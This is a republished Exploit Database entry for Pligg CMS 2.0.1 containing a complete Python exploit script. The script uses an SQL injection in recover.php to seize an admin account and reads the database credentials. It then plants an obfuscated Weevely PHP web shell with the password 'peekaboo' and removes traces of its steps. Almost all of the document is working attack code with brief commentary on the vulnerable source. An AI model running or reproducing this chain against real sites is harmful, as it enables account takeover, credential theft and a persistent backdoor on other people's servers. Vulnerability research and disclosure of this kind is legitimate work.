Pligg CMS 2.0.1 – Multiple Vulnerabilities

• Exploit Database
• 109 阅读

• 作者： BlackHawk
  日期： 2014-07-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34168/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173

  #!/usr/bin/python # # # Exploit Title:Pligg <= 2.0.1 SQL Injection / PWD disclosure / RCE # Author: BlackHawk # For base python code, # thanks to my fiend: The:Paradox # Disclosure date:24/07/2014 # Software Link:http://www.pligg.com/ # # To Elena, thank you for the time spent. # # """   ######### 1. SQLInjection / User passord change#########   Let&apos;s get some details, vuln it&apos;s pretty obvious , look at recover.php source: File: recover.php ---------------------------------------------------------- 29.$id=$_REQUEST[&apos;id&apos;]; 30.$n=$_REQUEST[&apos;n&apos;]; 31.$username=base64_decode($id); 32$sql="SELECT * FROM <code>" . table_users . "</code> where <code>user_login</code> = &apos;".$username."&apos; AND <code>last_reset_request</code> = FROM_UNIXTIME(&apos;".$n."&apos;) AND user_level!=&apos;Spammer&apos;"; [...] 61.$to = $user->user_email; 62.$subject = $main_smarty->get_config_vars("PLIGG_Visual_Name").&apos; &apos;.$main_smarty->get_config_vars("PLIGG_PassEmail_Subject"); 63. 64.$body = sprintf( 65.$main_smarty->get_config_vars("PLIGG_PassEmail_PassBody"), 66.$main_smarty->get_config_vars("PLIGG_Visual_Name"), 67.$my_base_url . $my_pligg_base . &apos;/login.php&apos;, 68.$user->user_login, 69.$password 70.); 71. 72.$headers = &apos;From: &apos; . $main_smarty->get_config_vars("PLIGG_PassEmail_From") . "\r\n"; 73.$headers .= "Content-type: text/html; charset=utf-8\r\n"; 74. 75.if (!mail($to, $subject, $body, $headers)) 76.{ 77.$saltedPass = generateHash($password); 78.$db->query(&apos;UPDATE <code>&apos; . table_users . "</code> SET <code>user_pass</code> = &apos;$saltedPass&apos; WHERE <code>user_login</code> = &apos;".$user->user_login."&apos;"); 79.$db->query(&apos;UPDATE <code>&apos; . table_users . &apos;</code> SET <code>last_reset_request</code> = FROM_UNIXTIME(&apos;.time().&apos;) WHERE <code>user_login</code> = "&apos;.$user->user_login.&apos;"&apos;); 80. 81.$current_user->Authenticate($user->user_login, $password); [...]   ----------------------------------------------------------   Thanks to the base64_decode there are no problems of magic_quotes or whatever, but as an mail must be sent for the password to be reset, you have to totally take control of the query so no sospicious notifications will be sent. To prevent sending clear data & quotes with the request, I&apos;ll not use $n variable, resulting in a longer and less fancy SQLInj.   Now that we are admin we use our power to: [+] get database data from dbsettings.php [+] plant some code to upload a post-exploitation Weevely shell   Code it&apos;s very dirty but works :) """   import urllib, urllib2, base64, re from time import sleep from sys import argv from cookielib import CookieJar print """ #=================================================================# # Pligg <= 2.0.1# #Sqli / Source leak / RCE # # Priviledge Escalation Exploit # # # # # # ___________ # #(___\( )/___)# #(___ | | ___)# # /"| ("\Experientia senum, # #( (| |) )agilitas iuvenum. # # <code>.!&apos; .&apos; # #/ .&apos;\Adversa fortiter. # #\|/ / Dubia prudenter. # # /.< # #(| |)# # | &apos; # # </code>-&apos; VK# # # #=================================================================# # Usage:# #./Exploit [Target] [Path] [Username] # # # # Example:# #./Exploit 127.0.0.1 /pligg/# #./Exploit www.host.com / # #=================================================================# # email: hawkgotyou[at]gmail[dot]comBlackHawk # #=================================================================# """   if len(argv) <= 3: exit() port = 80 target = argv[1] path = argv[2] uname = argv[3] cj = CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) formdata = {"reg_password" : "random", "reg_password2" : "random", "n" : "123", "processrecover" : "1", "id" : base64.b64encode(b"mrcongiuntivo&apos; UNION SELECT 1,(SELECT user_login FROM pligg_users WHERE user_level=&apos;admin&apos; LIMIT 1),3,4,5,6,&apos;sodoma@mailinator.com&apos;,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 FROM pligg_users WHERE user_login = &apos;warum") } data_encoded = urllib.urlencode(formdata) print "[+] Sending the reset password request for user "+ uname response = opener.open("http://" + target + path +"recover.php", data_encoded) content = response.read() print "[+] Heading to admin panel and activating anti-spam" response = opener.open("http://" + target + path +"admin/admin_config.php?action=save&var_id=12&var_value=true") content = response.read() print "[+] Setting a new blacklist file" response = opener.open("http://" + target + path +"admin/admin_config.php?action=save&var_id=14&var_value=libs/dbconnect.php") content = response.read() print "[+] Retrieving DB connection details" response = opener.open("http://" + target + path +"admin/domain_management.php") content = response.read() regex = re.compile("define\(\"([A-Z_]+?)\", &apos;(.*?)&apos;\)") print regex.findall(content) print "[+] Preparing dbconnection.php for shell injection.." response = opener.open("http://" + target + path +"admin/domain_management.php?id=0&list=blacklist&remove=?%3E") content = response.read() print "[+] Time for some shell planting, preparing file_put_contents.." seed = "IF(ISSET($_GET[WHR])){FILE_PUT_CONTENTS(STRIPSLASHES($_GET[WHR]),STRIPSLASHES($_GET[WHT]), FILE_APPEND);}CHMOD($_GET[WHR],0777);" response = opener.open("http://" + target + path +"admin/domain_management.php?id=&doblacklist="+seed) content = response.read() print "[+] Injecting weevely.php [ https://github.com/epinna/Weevely/ ] with pwd: peekaboo" weevely = """     <?php /**/ $ozyv="XBsYWNlKGFycmF5KCcvW15cdz1czrc10vJywnL1xzLycpLCBhcnJheSgnzrJyzrwnKycpLzrCBq"; $lphb="b2luKGFzrycmF5X3NsaWzrNlKzrCRhLCRjKCRhKS0zKSkpKzrSzrk7ZzrWNobyAzrnPCzr8nLiRrLiczr+Jzt9"; $jrtc="JGM9J2NvzrdW50JzskYT0kX0NPT0tJRTtpZihyZzrXNldCgkYSk9PSdwZScgJiYgzrJGMzroJGEpPjMpzreyRr"; $xxhr=str_replace("h","","shthrh_hrehphlahche"); $yuwd="PSdla2Fib28zrnzrO2zrVjaG8gJzwnLiRrLic+JztldmFzrsKGzrJhc2U2NF9kZWNvZGUocHJlZ19yZ"; $bzrj=$xxhr("oo","","booaoosooeoo6oo4_dooeoocooooodooe"); $atkr=$xxhr("b","","cbrebatbeb_bfbunbctbion"); $ajbi=$atkr("",$bzrj($xxhr("zr","",$jrtc.$yuwd.$ozyv.$lphb)));$ajbi(); ?>""" for wl in weevely.splitlines(): formdata = {"WHR" : "weevely.php", "WHT" : wl } data_encoded = urllib.urlencode(formdata) response = opener.open("http://" + target + path +"admin/admin_delete_comments.php?"+data_encoded) content = response.read() sleep(4) print "[+] Cleaning up the seeder.." response = opener.open("http://" + target + path +"admin/domain_management.php?id=0&list=blacklist&remove="+seed) content = response.read() print "[+] Resetting the blacklist file.." response = opener.open("http://" + target + path +"admin/admin_config.php?action=save&var_id=14&var_value=logs/domain-blacklist.log") content = response.read() print """ #=================================================================# Shell is [ http://"""+host+path+"""/admin/weevely.php ] #=================================================================# Access is via Weevely Python script   """